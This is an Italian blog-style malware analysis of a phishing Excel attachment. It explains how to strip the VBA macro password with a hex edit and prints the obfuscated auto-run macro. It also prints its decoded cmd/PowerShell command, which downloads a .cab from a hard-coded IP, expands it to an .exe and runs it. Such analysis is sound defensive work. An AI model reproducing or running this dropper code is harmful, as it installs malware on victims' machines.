Oggi ho ricevuto diverse e-mail con un finto messaggio di conferma di una spedizione. Allegato alla e-mail c’era anche un file Excel con nome GC3609_711.xls o con varianti simili sempre con le iniziali GC. Aprendo copio il file in una macchina virtuale e tento di aprire il file. Naturalmente c’è una macro che tenta di partire. Ma per fortuna le versioni recenti di Excel hanno per impostazione predefinita le macro disabilitate, ok. Apro l’editor delle macro, ovviamente la macro è protetta da password. Per sbloccare la password della macro VBA:
- aprire il file Excel con un editor esadecimale, tipo Notepad++;
- cercare la stringa DPB e cambiarla con DPx
- aprire di nuovo il file, aprire l’editor delle macro, andrà in errore non importa, impostare una nuova password a piacere;
- chiudere di nuovo il file e riaprilo, immettere la password per sbloccare la macro;
A questo punto il file è aperto per l’ispezione. Ovviamente c’è un evento all’apertura del file:
Sub Workbook_Open()
vgfhGGGgfhhdfh
End Sub
la funzione vgfhGGGgfhhdfh è:
Sub vgfhGGGgfhhdfh()
kggTUI6FREGfdg = esardhHvsmEBZuSZUhk(“c^m_d\ e/HKU cPƒoSwQepr]SbhRe‚lVl-.)ejxTe| i(WNre†we-dOKbLj€e-cEt{ =SyyCset}efma.UNxest:.W0e;b4CJlkime2n5tG)t.PD$oCwn)lNo^aJd†F}i~l{e…(h’Zhht?trpV:u/|/‚1r3>4u.M1.9&.t178%0w..4A4„/„sksQd…yLnda€m\o~ocsjs8/…s€sup4i.dZa„rOs[sS.jcpa(bQ’T,f’y%oTDEbM†PI%n\cFOg(d9g:F7F@F$gzf$g^Fw.vc1a8b=’-)];z leNx+p/aWn*d3 M%aT%E?M’Pp%A\lFig;d|g9F‚F&FXg’f<g0FT.Ncza@bo `%XToE+MHPq%Y\lF5g+ddggFBFiFsgƒfngGFY.ZeVx`e);6 Ds~t3a1rPtW ]%MT}E6M(Pm%J\OFvgIdRgmFfFEF_g,f,g`Fq.%e[xeY;#”)
Shell kggTUI6FREGfdg, vbNormalFocus
End Sub
la funzione esardhHvsmEBZuSZUhk contiene un sacco di fuffa, ma il fulcro è un ciclo for con step 2 che prende semplicemente un carattere si e un carattere no della stringa in input, è costruisce il comando:
“cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile(‘http://134.19.180.44/ssdynamooss/sspidarss.cab’,’%TEMP%\FgdgFFFgfgF.cab’); expand %TEMP%\FgdgFFFgfgF.cab %TEMP%\FgdgFFFgfgF.exe; start %TEMP%\FgdgFFFgfgF.exe;”
In pratica viene avviata una shell DOS che a sua volta utilizza la PowerShell per scaricare un file da un indirizzo predeterminato. Poi il file viene espanso in un exe e avviato.
Bel tentativo.